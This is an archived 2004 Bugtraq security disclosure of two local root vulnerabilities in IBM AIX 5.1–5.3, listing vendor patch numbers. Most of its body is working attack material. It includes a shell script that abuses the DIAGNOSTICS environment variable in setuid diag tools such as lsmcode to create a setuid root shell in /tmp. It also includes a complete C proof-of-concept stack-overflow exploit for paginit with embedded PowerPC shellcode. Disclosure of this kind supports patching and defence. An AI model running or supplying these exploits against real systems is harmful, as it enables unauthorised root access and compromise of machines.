AIX 5.1/5.2/5.3 local root exploits

From: cees-bart (ceesb_at_cs.ru.nl)
Date: 12/20/04

  • Next message: Thierry Carrez: "[ GLSA 200412-14 ] PHP: Multiple vulnerabilities"
    Date: Mon, 20 Dec 2004 12:10:41 +0100
    To: bugtraq@securityfocus.com
    
    

    hi,

    i found some local security holes in IBM's AIX versions 5.1, 5.2 and 5.3
    (unix for IBM RS/6000 powerpc).

    1) the first is a bug in all setuid diag related tools that use an
    environment variable as a prefix to an external binary executed as root.

    2) the second is a classical stack overflow in a tool called paginit.

    status: vendor contacted, patches are available:

    1) for the diag bug, bugfix numbers are IY64389(5.1), IY64523(5.2), and
    IY64277(5.3).
    2) for the paginit bug, bugfix numbers are IY64358(5.1), IY64522(5.2),
    and IY64312(5.3).

    bug descriptions below.

    regards,
    cees-bart
    phd student @ university of nijmegen

    ---
    bug 1:
    there are (at least) 4 broken suid binaries.
    -r-sr-xr-x   1 root     system        10014 Sep 16 2002  /usr/sbin/lsmcode
    -r-sr-x---   1 root     system         2796 Jan 26 2003  
    /usr/sbin/diag_exec
    -r-sr-xr-x   1 root     system       450433 Apr 08 2004  /usr/sbin/invscout
    -r-sr-xr-x   1 root     system       511362 Apr 08 2004  
    /usr/sbin/invscoutd
    all these binaries are exploited the same way: the path set in the 
    $DIAGNOSTICS environment is used by these binaries to execute 
    $DIAGNOSTICS/bin/Dctrl as root (duh).
    for example; executing the following gives a root shell:
    mkdirhier /tmp/aap/bin
    export DIAGNOSTICS=/tmp/aap
    cat > /tmp/aap/bin/Dctrl << EOF
    #!/bin/sh
    cp /bin/sh /tmp/.shh
    chown root:system /tmp/.shh
    chmod u+s /tmp/.shh
    EOF
    chmod a+x /tmp/aap/bin/Dctrl
    lsmcode
    /tmp/.shh
    bug 2:
    the following setuid binary:
    -r-sr-xr-x   1 root     security       7354 Mar 12 2003  /usr/bin/paginit
    does not do a bounds check on the first commandline argument, which is 
    supposed to be a username.
    if you feed paginit the proper data and hit enter, root priviledges are 
    gained.
    POC exploit code:
    /* exploit for /usr/bin/paginit
       tested on: AIX 5.2
       if the exploit fails it's because the shellcode
       ends up at a different address. use dbx to check,
       and change RETADDR accordingly.
       cees-bart <ceesb@cs.ru.nl>
    */
    #define RETADDR 0x2ff22c90
    char shellcode[] =
    "\x7c\xa5\x2a\x79"
    "\x40\x82\xff\xfd"      
    "\x7c\xa8\x02\xa6"      
    "\x38\xe0\x11\x11"
    "\x39\x20\x48\x11"      
    "\x7c\xc7\x48\x10"      
    "\x38\x46\xc9\x05"      
    "\x39\x25\x11\x11"
    "\x38\x69\xef\x17"      
    "\x38\x87\xee\xef"      
    "\x7c\xc9\x03\xa6"      
    "\x4e\x80\x04\x20"
    "\x2f\x62\x69\x6e"      
    "\x2f\x73\x68\x00"
    ;
    char envlabel[] = "X=";
    void printint(char* buf, int x) {
      buf[0] = x >> 24;
      buf[1] = (x >> 16) & 0xff;
      buf[2] = (x >> 8) & 0xff;
      buf[3] = x & 0xff;
    }
    int main(int argc, char **argv) {
      char *env[3];
      char code[1000];
      char buf[8000];
      char *p, *i;
      int offset1 = 0;
      offset1 = 0; // atoi(argv[1]);
      
      memset(code, 'C', sizeof(code));
      memcpy(code, envlabel,sizeof(envlabel)-1);
      // landingzone 
      for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4) 
        printint(i, 0x7ca52a79);
      memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);  
      code[sizeof(code)-1] = 0;
      
      env[0] = code;
      env[1] = 0;
      memset(buf, 'A', sizeof(buf));
      buf[sizeof(buf)-1] = 0; 
      
      p = buf;
      p += 4114;
      printint(p,RETADDR); // try to hit the landingzone
      p += 72;
      printint(p, RETADDR); // any readable address (apparently not overwritten)
      execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env);
    }
      
    

  • Next message: Thierry Carrez: "[ GLSA 200412-14 ] PHP: Multiple vulnerabilities"

    Relevant Pages

    • Re: Bug analysis
      ... char *ReadTextFile ... The writer of this code is an experienced C programmer. ... has this bug, that is a classical bug with zero terminated strings, ... in the implementation of the string library in lcc-win you ...
      (comp.lang.c)
    • Re: Malcolms new book - Chapter 1 review
      ... If you still can't find the bug, post the code here, and we'll find ... I added and deleted some white space characters. ... char *readline ... buff = malloc; ...
      (comp.lang.c)
    • Re: Bug analysis
      ... char *ReadTextFile ... has this bug, that is a classical bug with zero terminated strings, ... programmer has less bug surface. ... in the implementation of the string library in lcc-win you ...
      (comp.lang.c)
    • Re: Having Problem with a String....Please help....
      ... its got a bug that occurs. ... I do not have a whole lot of experience with BSTR ... void MyEncrypt(BSTR key, char * value,int sizeofValue, CStringA ... You see it is a Unicode app but I do not see any Unicode in it. ...
      (microsoft.public.vc.mfc)
    • Re: 2.6.28-rc6-git1 -- BUG: unable to handle kernel paging request at ffff8800be8b00
      ... I looked at the oops and I'm pretty sure SLUB is not at ... const char *kallsyms_lookup(unsigned long addr, ... BUG: unable to handle kernel paging request at ffff8800be8b0019 ... the value of KSYM_NAME_LEN is 128 so the offset matches as well ...
      (Linux-Kernel)